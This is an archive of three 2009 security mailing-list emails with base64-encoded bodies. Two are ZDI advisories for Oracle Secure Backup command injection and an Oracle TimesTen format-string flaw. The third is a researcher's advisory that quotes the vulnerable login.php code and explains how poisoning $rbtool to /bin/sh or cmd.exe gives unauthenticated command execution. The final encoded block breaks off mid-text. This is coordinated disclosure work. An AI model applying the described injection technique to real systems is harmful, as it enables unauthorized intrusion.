Subject: ZDI-09-003: Oracle Secure Backup exec_qr() Command Injection Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF752E396B.80054323-ON8525753E.00704AC9-8625753E.0070942F@3com.com>
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:29:40 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/14/2009 12:29:43 PM,
Serialize complete at 01/14/2009 12:29:43 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA5LTAwMzogT3JhY2xlIFNlY3VyZSBCYWNrdXAgZXhlY19xcigpIENvbW1hbmQgSW5qZWN0
aW9uIFZ1bG5lcmFiaWxpdHkNCmh0dHA6Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fkdmlz
b3JpZXMvWkRJLTA5LTAwMw0KSmFudWFyeSAxNCwgMjAwOQ0KDQotLSBBZmZlY3RlZCBWZW5kb3Jz
Og0KT3JhY2xlDQoNCi0tIEFmZmVjdGVkIFByb2R1Y3RzOg0KT3JhY2xlIFNlY3VyZSBCYWNrdXAN
Cg0KLS0gVnVsbmVyYWJpbGl0eSBEZXRhaWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyBy
ZW1vdGUgYXR0YWNrZXJzIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgb24NCnZ1bG5lcmFibGUg
aW5zdGFsbGF0aW9ucyBvZiBPcmFjbGUgU2VjdXJlIEJhY2t1cC4gQXV0aGVudGljYXRpb24gaXMg
bm90DQpyZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0eS4NCg0KVGhlIHNwZWNp
ZmljIGZsYXcgZXhpc3RzIHdpdGhpbiB0aGUgcm91dGluZSBleGVjX3FyKCkgZGVmaW5lZCBpbiB0
aGUgd2ViDQpzY3JpcHQgbG9naW4ucGhwLiBUaGUgdXNlci1zdXBwbGllZCB2YXJpYWJsZSAkcmJ0
b29sIGlzIGltcHJvcGVybHkNCnNhbml0aXplZCBhbmQgbGF0ZXIgcGFzc2VkIHRocm91Z2ggYSBj
YWxsIHRvIHBvcGVuKCksIHRoaXMgY2FuIHJlc3VsdCBpbg0KcmVtb3RlIHByZS1hdXRoZW50aWNh
dGlvbiBjb21tYW5kIGluamVjdGlvbi4NCg0KLS0gVmVuZG9yIFJlc3BvbnNlOg0KT3JhY2xlIGhh
cyBpc3N1ZWQgYW4gdXBkYXRlIHRvIGNvcnJlY3QgdGhpcyB2dWxuZXJhYmlsaXR5LiBNb3JlDQpk
ZXRhaWxzIGNhbiBiZSBmb3VuZCBhdDoNCg0KaHR0cDovL3d3dy5vcmFjbGUuY29tL3RlY2hub2xv
Z3kvZGVwbG95L3NlY3VyaXR5L2NyaXRpY2FsLXBhdGNoLXVwZGF0ZXMvY3B1amFuMjAwOS5odG1s
DQoNCi0tIERpc2Nsb3N1cmUgVGltZWxpbmU6DQoyMDA3LTA3LTEzIC0gVnVsbmVyYWJpbGl0eSBy
ZXBvcnRlZCB0byB2ZW5kb3INCjIwMDktMDEtMTQgLSBDb29yZGluYXRlZCBwdWJsaWMgcmVsZWFz
ZSBvZiBhZHZpc29yeQ0KDQotLSBDcmVkaXQ6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgd2FzIGRpc2Nv
dmVyZWQgYnk6DQogICAgKiBKb3hlYW4gS29yZXQNCg0KLS0gQWJvdXQgdGhlIFplcm8gRGF5IElu
aXRpYXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5nUG9pbnQsIFRoZSBaZXJvIERh
eSBJbml0aWF0aXZlIChaREkpIHJlcHJlc2VudHMgDQphIGJlc3Qtb2YtYnJlZWQgbW9kZWwgZm9y
IHJld2FyZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVzcG9uc2libHkNCmRpc2Nsb3Np
bmcgZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuDQoNClJlc2VhcmNoZXJzIGludGVyZXN0ZWQg
aW4gZ2V0dGluZyBwYWlkIGZvciB0aGVpciBzZWN1cml0eSByZXNlYXJjaA0KdGhyb3VnaCB0aGUg
WkRJIGNhbiBmaW5kIG1vcmUgaW5mb3JtYXRpb24gYW5kIHNpZ24tdXAgYXQ6DQoNCiAgICBodHRw
Oi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbQ0KDQpUaGUgWkRJIGlzIHVuaXF1ZSBpbiBob3cg
dGhlIGFjcXVpcmVkIHZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gaXMNCnVzZWQuIFRpcHBpbmdQ
b2ludCBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5IGRldGFpbHMgb3IgYW55DQpl
eHBsb2l0IGNvZGUuIEluc3RlYWQsIHVwb24gbm90aWZ5aW5nIHRoZSBhZmZlY3RlZCBwcm9kdWN0
IHZlbmRvciwNClRpcHBpbmdQb2ludCBwcm92aWRlcyBpdHMgY3VzdG9tZXJzIHdpdGggemVybyBk
YXkgcHJvdGVjdGlvbiB0aHJvdWdoDQppdHMgaW50cnVzaW9uIHByZXZlbnRpb24gdGVjaG5vbG9n
eS4gRXhwbGljaXQgZGV0YWlscyByZWdhcmRpbmcgdGhlDQpzcGVjaWZpY3Mgb2YgdGhlIHZ1bG5l
cmFiaWxpdHkgYXJlIG5vdCBleHBvc2VkIHRvIGFueSBwYXJ0aWVzIHVudGlsDQphbiBvZmZpY2lh
bCB2ZW5kb3IgcGF0Y2ggaXMgcHVibGljbHkgYXZhaWxhYmxlLiBGdXJ0aGVybW9yZSwgd2l0aCB0
aGUNCmFsdHJ1aXN0aWMgYWltIG9mIGhlbHBpbmcgdG8gc2VjdXJlIGEgYnJvYWRlciB1c2VyIGJh
c2UsIFRpcHBpbmdQb2ludA0KcHJvdmlkZXMgdGhpcyB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9u
IGNvbmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5DQp2ZW5kb3JzIChpbmNsdWRpbmcgY29tcGV0aXRv
cnMpIHdobyBoYXZlIGEgdnVsbmVyYWJpbGl0eSBwcm90ZWN0aW9uIG9yDQptaXRpZ2F0aW9uIHBy
b2R1Y3QuDQoNCk91ciB2dWxuZXJhYmlsaXR5IGRpc2Nsb3N1cmUgcG9saWN5IGlzIGF2YWlsYWJs
ZSBvbmxpbmUgYXQ6DQoNCiAgICBodHRwOi8vd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbS9hZHZp
c29yaWVzL2Rpc2Nsb3N1cmVfcG9saWN5Lw0KDQpDT05GSURFTlRJQUxJVFkgTk9USUNFOiBUaGlz
IGUtbWFpbCBtZXNzYWdlLCBpbmNsdWRpbmcgYW55IGF0dGFjaG1lbnRzLA0KaXMgYmVpbmcgc2Vu
dCBieSAzQ29tIGZvciB0aGUgc29sZSB1c2Ugb2YgdGhlIGludGVuZGVkIHJlY2lwaWVudChzKSBh
bmQNCm1heSBjb250YWluIGNvbmZpZGVudGlhbCwgcHJvcHJpZXRhcnkgYW5kL29yIHByaXZpbGVn
ZWQgaW5mb3JtYXRpb24uDQpBbnkgdW5hdXRob3JpemVkIHJldmlldywgdXNlLCBkaXNjbG9zdXJl
IGFuZC9vciBkaXN0cmlidXRpb24gYnkgYW55IA0KcmVjaXBpZW50IGlzIHByb2hpYml0ZWQuICBJ
ZiB5b3UgYXJlIG5vdCB0aGUgaW50ZW5kZWQgcmVjaXBpZW50LCBwbGVhc2UNCmRlbGV0ZSBhbmQv
b3IgZGVzdHJveSBhbGwgY29waWVzIG9mIHRoaXMgbWVzc2FnZSByZWdhcmRsZXNzIG9mIGZvcm0g
YW5kDQphbnkgaW5jbHVkZWQgYXR0YWNobWVudHMgYW5kIG5vdGlmeSAzQ29tIGltbWVkaWF0ZWx5
IGJ5IGNvbnRhY3RpbmcgdGhlDQpzZW5kZXIgdmlhIHJlcGx5IGUtbWFpbCBvciBmb3J3YXJkaW5n
IHRvIDNDb20gYXQgcG9zdG1hc3RlckAzY29tLmNvbS4gDQo
From - Wed Jan 14 16:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39181-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 75C52EC88D
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:51:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5152A237271; Wed, 14 Jan 2009 14:14:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10809 invoked from network); 14 Jan 2009 20:06:31 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFEDF225A6.227226D0-ON8525753E.00704BCC-8625753E.00709C2A@3com.com>
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:30:01 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/14/2009 12:30:04 PM,
Serialize complete at 01/14/2009 12:30:04 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   

WkRJLTA5LTAwNDogT3JhY2xlIFRpbWVzVGVuIGV2dGR1bXAgUmVtb3RlIEZvcm1hdCBTdHJpbmcg
VnVsbmVyYWJpbGl0eQ0KaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmll
cy9aREktMDktMDA0DQpKYW51YXJ5IDE0LCAyMDA5DQoNCi0tIEFmZmVjdGVkIFZlbmRvcnM6DQpP
cmFjbGUNCg0KLS0gQWZmZWN0ZWQgUHJvZHVjdHM6DQpPcmFjbGUgVGltZXNUZW4NCg0KLS0gVGlw
cGluZ1BvaW50KFRNKSBJUFMgQ3VzdG9tZXIgUHJvdGVjdGlvbjoNClRpcHBpbmdQb2ludCBJUFMg
Y3VzdG9tZXJzIGhhdmUgYmVlbiBwcm90ZWN0ZWQgYWdhaW5zdCB0aGlzDQp2dWxuZXJhYmlsaXR5
IGJ5IERpZ2l0YWwgVmFjY2luZSBwcm90ZWN0aW9uIGZpbHRlciBJRCA2MDUyLiANCkZvciBmdXJ0
aGVyIHByb2R1Y3QgaW5mb3JtYXRpb24gb24gdGhlIFRpcHBpbmdQb2ludCBJUFMsIHZpc2l0Og0K
DQogICAgaHR0cDovL3d3dy50aXBwaW5ncG9pbnQuY29tDQoNCi0tIFZ1bG5lcmFiaWxpdHkgRGV0
YWlsczoNClRoaXMgdnVsbmVyYWJpbGl0eSBhbGxvd3MgcmVtb3RlIGF0dGFja2VycyB0byBleGVj
dXRlIGFyYml0cmFyeSBjb2RlIG9uDQp2dWxuZXJhYmxlIGluc3RhbGxhdGlvbnMgb2YgT3JhY2xl
IFRpbWVzVGVuLiBVc2VyIGludGVyYWN0aW9uIGlzIG5vdA0KcmVxdWlyZWQgdG8gZXhwbG9pdCB0
aGlzIHZ1bG5lcmFiaWxpdHkuDQoNClRoZSBzcGVjaWZpYyBmbGF3IGV4aXN0cyBpbiB0aGUgZXZ0
ZHVtcCBDR0kgbW9kdWxlLCB3aGljaCBpcyB1c2VkIHRvDQp3cml0ZSB0byBhbiBpbnRlcm5hbCBs
b2cgZmlsZS4gVGhlIHBhcmFtZXRlciAnbXNnJyBkb2VzIG5vdCBwcm9wZXJseQ0Kc2FuaXRpemUg
Zm9ybWF0IHN0cmluZyB0b2tlbnMgYW5kIGNhbiBiZSBleHBsb2l0ZWQgdG8gZXhlY3V0ZSBhcmJp
dHJhcnkNCmNvZGUuDQoNCi0tIFZlbmRvciBSZXNwb25zZToNCk9yYWNsZSBoYXMgaXNzdWVkIGFu
IHVwZGF0ZSB0byBjb3JyZWN0IHRoaXMgdnVsbmVyYWJpbGl0eS4gTW9yZQ0KZGV0YWlscyBjYW4g
YmUgZm91bmQgYXQ6DQoNCmh0dHA6Ly93d3cub3JhY2xlLmNvbS90ZWNobm9sb2d5L2RlcGxveS9z
ZWN1cml0eS9jcml0aWNhbC1wYXRjaC11cGRhdGVzL2NwdWphbjIwMDkuaHRtbA0KDQotLSBEaXNj
bG9zdXJlIFRpbWVsaW5lOg0KMjAwOC0wNC0wNyAtIFZ1bG5lcmFiaWxpdHkgcmVwb3J0ZWQgdG8g
dmVuZG9yDQoyMDA5LTAxLTE0IC0gQ29vcmRpbmF0ZWQgcHVibGljIHJlbGVhc2Ugb2YgYWR2aXNv
cnkNCg0KLS0gQ3JlZGl0Og0KVGhpcyB2dWxuZXJhYmlsaXR5IHdhcyBkaXNjb3ZlcmVkIGJ5Og0K
ICAgICogSm94ZWFuIEtvcmV0DQoNCi0tIEFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlICha
REkpOg0KRXN0YWJsaXNoZWQgYnkgVGlwcGluZ1BvaW50LCBUaGUgWmVybyBEYXkgSW5pdGlhdGl2
ZSAoWkRJKSByZXByZXNlbnRzIA0KYSBiZXN0LW9mLWJyZWVkIG1vZGVsIGZvciByZXdhcmRpbmcg
c2VjdXJpdHkgcmVzZWFyY2hlcnMgZm9yIHJlc3BvbnNpYmx5DQpkaXNjbG9zaW5nIGRpc2NvdmVy
ZWQgdnVsbmVyYWJpbGl0aWVzLg0KDQpSZXNlYXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcg
cGFpZCBmb3IgdGhlaXIgc2VjdXJpdHkgcmVzZWFyY2gNCnRocm91Z2ggdGhlIFpESSBjYW4gZmlu
ZCBtb3JlIGluZm9ybWF0aW9uIGFuZCBzaWduLXVwIGF0Og0KDQogICAgaHR0cDovL3d3dy56ZXJv
ZGF5aW5pdGlhdGl2ZS5jb20NCg0KVGhlIFpESSBpcyB1bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJl
ZCB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9uIGlzDQp1c2VkLiBUaXBwaW5nUG9pbnQgZG9lcyBu
b3QgcmUtc2VsbCB0aGUgdnVsbmVyYWJpbGl0eSBkZXRhaWxzIG9yIGFueQ0KZXhwbG9pdCBjb2Rl
LiBJbnN0ZWFkLCB1cG9uIG5vdGlmeWluZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdCB2ZW5kb3IsDQpU
aXBwaW5nUG9pbnQgcHJvdmlkZXMgaXRzIGN1c3RvbWVycyB3aXRoIHplcm8gZGF5IHByb3RlY3Rp
b24gdGhyb3VnaA0KaXRzIGludHJ1c2lvbiBwcmV2ZW50aW9uIHRlY2hub2xvZ3kuIEV4cGxpY2l0
IGRldGFpbHMgcmVnYXJkaW5nIHRoZQ0Kc3BlY2lmaWNzIG9mIHRoZSB2dWxuZXJhYmlsaXR5IGFy
ZSBub3QgZXhwb3NlZCB0byBhbnkgcGFydGllcyB1bnRpbA0KYW4gb2ZmaWNpYWwgdmVuZG9yIHBh
dGNoIGlzIHB1YmxpY2x5IGF2YWlsYWJsZS4gRnVydGhlcm1vcmUsIHdpdGggdGhlDQphbHRydWlz
dGljIGFpbSBvZiBoZWxwaW5nIHRvIHNlY3VyZSBhIGJyb2FkZXIgdXNlciBiYXNlLCBUaXBwaW5n
UG9pbnQNCnByb3ZpZGVzIHRoaXMgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiBjb25maWRlbnRp
YWxseSB0byBzZWN1cml0eQ0KdmVuZG9ycyAoaW5jbHVkaW5nIGNvbXBldGl0b3JzKSB3aG8gaGF2
ZSBhIHZ1bG5lcmFiaWxpdHkgcHJvdGVjdGlvbiBvcg0KbWl0aWdhdGlvbiBwcm9kdWN0Lg0KDQpP
dXIgdnVsbmVyYWJpbGl0eSBkaXNjbG9zdXJlIHBvbGljeSBpcyBhdmFpbGFibGUgb25saW5lIGF0
Og0KDQogICAgaHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNvcmllcy9kaXNj
bG9zdXJlX3BvbGljeS8NCg0KQ09ORklERU5USUFMSVRZIE5PVElDRTogVGhpcyBlLW1haWwgbWVz
c2FnZSwgaW5jbHVkaW5nIGFueSBhdHRhY2htZW50cywNCmlzIGJlaW5nIHNlbnQgYnkgM0NvbSBm
b3IgdGhlIHNvbGUgdXNlIG9mIHRoZSBpbnRlbmRlZCByZWNpcGllbnQocykgYW5kDQptYXkgY29u
dGFpbiBjb25maWRlbnRpYWwsIHByb3ByaWV0YXJ5IGFuZC9vciBwcml2aWxlZ2VkIGluZm9ybWF0
aW9uLg0KQW55IHVuYXV0aG9yaXplZCByZXZpZXcsIHVzZSwgZGlzY2xvc3VyZSBhbmQvb3IgZGlz
dHJpYnV0aW9uIGJ5IGFueSANCnJlY2lwaWVudCBpcyBwcm9oaWJpdGVkLiAgSWYgeW91IGFyZSBu
b3QgdGhlIGludGVuZGVkIHJlY2lwaWVudCwgcGxlYXNlDQpkZWxldGUgYW5kL29yIGRlc3Ryb3kg
YWxsIGNvcGllcyBvZiB0aGlzIG1lc3NhZ2UgcmVnYXJkbGVzcyBvZiBmb3JtIGFuZA0KYW55IGlu
Y2x1ZGVkIGF0dGFjaG1lbnRzIGFuZCBub3RpZnkgM0NvbSBpbW1lZGlhdGVseSBieSBjb250YWN0
aW5nIHRoZQ0Kc2VuZGVyIHZpYSByZXBseSBlLW1haWwgb3IgZm9yd2FyZGluZyB0byAzQ29tIGF0
IHBvc3RtYXN0ZXJAM2NvbS5jb20uIA0K

From - Wed Jan 14 17:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ea
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39182-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8E00BEC8E8
for <lists@securityspace.com>; Wed, 14 Jan 2009 17:00:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 027AE23724A; Wed, 14 Jan 2009 14:15:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11449 invoked from network); 14 Jan 2009 20:27:08 -0000
X-Yahoo-Newman-Id: 9498.29225.bm@omp208.mail.re3.yahoo.com
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.es;
  h=Received:X-YMail-OSG:X-Yahoo-Newman-Property:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer;
  b=lW5zytiYwQnadpqnwpoj1jKQf7dS3p253Y1JUv6TRwhsZYTZeLU4wNG3wp99NSjrjwuWnNin8assKXddYyn3tR9r/oAv8UhMML/Sgqc7TI5tw68ET3E+qe+5ddBPM5vhPRLPVX2X7M/iSJS1eCeVK7C66lfbfYPPPZ1FXAoN/s4=  ;
X-YMail-OSG: 3uQ85voVM1lDG42WbBNTS0P9qDS7C3pCGT6eX1w5gUvMBQ6bgushqTw7KoeYdFjDT4MG00ltYCejyaaky800bLC1ch_KZ5zTi.eNb_bp.eYrptBu2OienAPhH7KkxEI7LmqLqkAv35pqebd4JU7BCrWLwkGS6bZRjdQ9elMiZVdFvlmeRVs6kSobaA3nWpaZ7s7WR6FuDDssr.ulv94MRkpJUH8-
X-Yahoo-Newman-Property: ymail-3
Subject: Oracle Secure Backup 10g Remote Code Execution
From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-YhepHLVg9ODiz52nJhvx"
Date: Wed, 14 Jan 2009 21:51:47 +0100
Message-Id: <1231966307.18860.8.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-YhepHLVg9ODiz52nJhvx
Content-Type: multipart/mixed; boundary="=-khnqrW9NU0VZCuXuDSRv"


--=-khnqrW9NU0VZCuXuDSRv
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi,

Happy new year! Attached goes and advisory for one of the recently fixed
Oracle vulnerabilities in the product Oracle Secure Backup.

Regards,
Joxean Koret



--=-khnqrW9NU0VZCuXuDSRv
Content-Disposition: attachment; filename=oracle-secure-backup-2009-01-14.txt
Content-Type: text/plain; name=oracle-secure-backup-2009-01-14.txt; charset=UTF-8
Content-Transfer-Encoding: base64

T3JhY2xlIFNlY3VyZSBCYWNrdXAgMTBnIFJlbW90ZSBDb2RlIEV4ZWN1dGlvbg0KPT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpQcm9kdWN0IERlc2NyaXB0
aW9uDQo9PT09PT09PT09PT09PT09PT09DQoNCk9yYWNsZSBTZWN1cmUgQmFja3VwIGlzIGEgY2Vu
dHJhbGl6ZWQgdGFwZSBiYWNrdXAgbWFuYWdlbWVudCBzb2Z0d2FyZSBwcm92aWRpbmcNCnNlY3Vy
ZSBkYXRhIHByb3RlY3Rpb24gZm9yIGhldGVyb2dlbmVvdXMgZmlsZSBzeXN0ZW1zIGFuZCB0aGUg
T3JhY2xlIERhdGFiYXNlLg0KDQpTdW1tYXJ5DQo9PT09PT09DQoNClRoZSBPcmFjbGUgSmFudWFy
eSAyMDA5IENyaXRpY2FsIFBhdGNoIFVwZGF0ZSBmaXhlcyBhIHZ1bG5lcmFiaWxpdHkgd2hpY2gN
CmFsbG93cyBhIHJlbW90ZSBwcmVhdXRoZW50aWNhdGVkIGF0dGFja2VyIHRvIGV4ZWN1dGUgYXJi
aXRyYXJ5IGNvZGUgaW4gdGhlDQpjb250ZXh0IG9mIHRoZSB1c2VyIHJ1bm5pbmcgdGhlIHdlYiBz
ZXJ2ZXIgb2YgT3JhY2xlIFNlY3VyZSBCYWNrdXAuDQoNCkluIFdpbmRvd3MgZW52aXJvbm1lbnRz
LCB0aGUgdnVsbmVyYWJpbGl0eSBhbGxvd3MgZXhlY3V0aW9uIG9mIGFyYml0cmFyeSBjb2RlIGFz
DQpTWVNURU0uIEluIFVuaXggYW5kIEdOVS9MaW51eCBlbnZpcm9ubWVudHMsIGhvd2V2ZXIsIGp1
c3QgYXMgYSBub3JtYWwgdXNlcg0KKG9yYWNsZSB1c3VhbGx5KS4NCg0KQ1ZTUzIgUmlzayBTY29y
ZQ0KPT09PT09PT09PT09PT09PQ0KDQpNaWNyb3NvZnQgV2luZG93czogMTANCkxpbnV4IGFuZCBV
bml4ICAgOiAgNyw1DQoNCkFmZmVjdGVkIHZlcnNpb25zDQo9PT09PT09PT09PT09PT09PQ0KDQpP
cmFjbGUgU2VjdXJlIEJhY2t1cCB2ZXJzaW9uIDEwLjEuMC4zIHRvIDEwLjIuMC4yIGluIGFsbCBz
dXBwb3J0ZWQgb3BlcmF0aW5nIHN5c3RlbXMNCmFyZSBhZmZlY3RlZC4NCg0KVnVsbmVyYWJpbGl0
eSBEZXRhaWxzDQo9PT09PT09PT09PT09PT09PT09PT0NCg0KT3JhY2xlIFNlY3VyZSBCYWNrdXAg
Y29tZXMgd2l0aCBvbmUgUEhQIGJhc2VkIGZyb250ZW5kIHdoaWNoIGlzIHZ1bG5lcmFibGUgdG8g
YQ0KdmFyaWFibGUgcG9pc29uaW5nIGF0dGFjayByZWdhcmRsZXNzIGlmIHRoZSBQSFAgZGlyZWN0
aXZlIHJlZ2lzdGVyX2dsb2JhbHMgaXMgDQplbmFibGVkIG9yIG5vdC4NCg0KSW50ZXJuYWxseSwg
YWxsIHRoZSB2YXJpYWJsZXMgcGFzc2VkIHRvIHRoZSBzY3JpcHQgbG9naW4ucGhwIGFyZSBjb252
ZXJ0ZWQgdG8gZ2xvYmFsDQp2YXJpYWJsZXMgaW4gdGhlIGZpbGUgJFJPT1RccGhwXGdsb2JhbHMu
cGhwLiBBbnkgdmFyaWFibGUgcmVnYXJkaW5nIG9yIHJlZ2FyZGxlc3MgdGhlDQptZXRob2QgdXNl
ZCB0byBzZW5kIHRoZSBxdWVyeSB3aWxsIGJlIHJlZ2lzdGVyZWQgYXMgYSBnbG9iYWwgdmFyaWFi
bGUuDQoNCkZyb20gdGhlIGxvZ2luIHNjcmlwdCBjYWxsZWQgImxvZ2luLnBocCIgdGhlIHRvb2wg
Im9idC5leGUiIGlzIGV4ZWN1dGVkIHdpdGggYSBwb3Blbg0KY2FsbCBwYXNzaW5nIGFyZ3VtZW50
cyByZWNlaXZlZCBmcm9tIHRoZSBjbGllbnQuIFRoZXNlIGFyZ3VtZW50cyBhcmUgbm90IHNhbml0
aXplZA0Kbm9yIHZlcmlmaWVkIGFuZCBpdCBhbGxvd3MgcG9zdC1hdXRoZW50aWNhdGlvbiByZW1v
dGUgY29tbWFuZCBleGVjdXRpb24gQlVUIGR1ZSB0byBhDQpsb2dpYyBmYWlsdXJlIGluIHRoZSBz
Y3JpcHQgImxvZ2luLnBocCIgd2hlbiB0aGUgdmFyaWFibGUgImNsZWFyIiBoYXMgdGhlIHZhbHVl
ICJubyINCmFuZCBvdGhlciB2YXJpYWJsZXMgKHRoYXQgc3VwcG9zZWRseSBjb21lcyBmcm9tIGEg
Y29va2llKSBhcmUgc2V0IGFueW9uZSBjYW4gZXhlY3V0ZQ0Kb3BlcmF0aW5nIHN5c3RlbSBjb21t
YW5kIGZyb20gcmVtb3RlIHdpdGhvdXQgYmVpbmcgYXV0aGVudGljYXRlZC4gVGhlIHZ1bG5lcmFi
bGUgY29kZQ0KaXMgdGhlIGZvbGxvd2luZzoNCg0KKC4uLikNCiAgICBpZiAoc3RybGVuKCRvcmFf
b3NiX2JnY29va2llKSA+IDAgJiYgJGJ1dHRvbiA9PSAiTG9nb3V0IikNCiAgICAgIHsNCiAgICAg
IC8vIFR1cm4gREVCVUdfRVhFQyB0byBvZmYNCiAgICAgICR0bXAgPSAkREVCVUdfRVhFQzsNCiAg
ICAgICRERUJVR19FWEVDID0gIm5vIjsNCg0KICAgICAgLy8gVGVtaW5hdGUgdGhlIGNvbm5lY3Rp
b24uDQogICAgICAkcXJfY29tbWFuZCA9ICIkcmJ0b29sIC0tdGVybWluYXRlICRvcmFfb3NiX2Jn
Y29va2llLSRvcmFfb3NiX2xjb29raWUiOw0KICAgICAgJG1zZyA9IGV4ZWNfcXIoIiRxcl9jb21t
YW5kIik7DQoNCiAgICAgIGlmIChzdHJuY21wKCRtc2dbMF0sICJFcnJvcjoiLCA2KSkNCiAgICAg
ICAgew0KICAgICAgICAvLyBTZXQgdGhlIGNvb2tpZSB1cC4NCiAgICAgICAgc2V0Y29va2llKCJv
cmFfb3NiX2JnY29va2llIiwgIiIpOw0KICAgICAgICBzZXRjb29raWUoIm9yYV9vc2JfbGNvb2tp
ZSIsICIiKTsNCiAgICAgICAgJG9yYV9vc2JfYmdjb29raWUgPSAiIjsNCiAgICAgICAgfQ0KDQog
ICAgICAvLyBSZXNldCBERUJVR19FWEVDLg0KICAgICAgJERFQlVHX0VYRUMgPSAkZHRtcDsNCiAg
ICAgIH0NCiAgICBoZWFkZXIoIkxvY2F0aW9uOiAvbG9naW4ucGhwP2NsZWFyPXllcyIpOw0KICAg
IH0NCiguLi4pDQoNClRoZSBmdW5jdGlvbiAiZXhlY19xciIgaW50ZXJuYWxseSBjYWxscyB0aGUg
ZnVuY3Rpb24gUEhQIGZ1bmN0aW9uICJwb3BlbiIgdG8gZXhlY3V0ZQ0KYSBjb21tYW5kLiBUaGUg
JHJidG9vbCB2YXJpYWJsZSwgYWJ1c2luZyBmcm9tIHRoZSB2YXJpYWJsZSBwb2lzb25pbmcgYXR0
YWNrLCBjYW4gYmUNCmNoYW5nZWQgdG8sIGluIGV4YW1wbGUsIC9iaW4vc2ggb3IgY21kLmV4ZSB0
byBleGVjdXRlIGFyYml0cmFyeSBjb21tYW5kcyB3aXRob3V0IHRoZQ0KbmVlZCBmb3IgYSB1c2Vy
IG5hbWUgb3IgcGFzc3dvcmQsIGp1c3Qgd2l0aCBuZXR3b3JrIGFjY2VzcyB0byB0aGUgT3JhY2xl
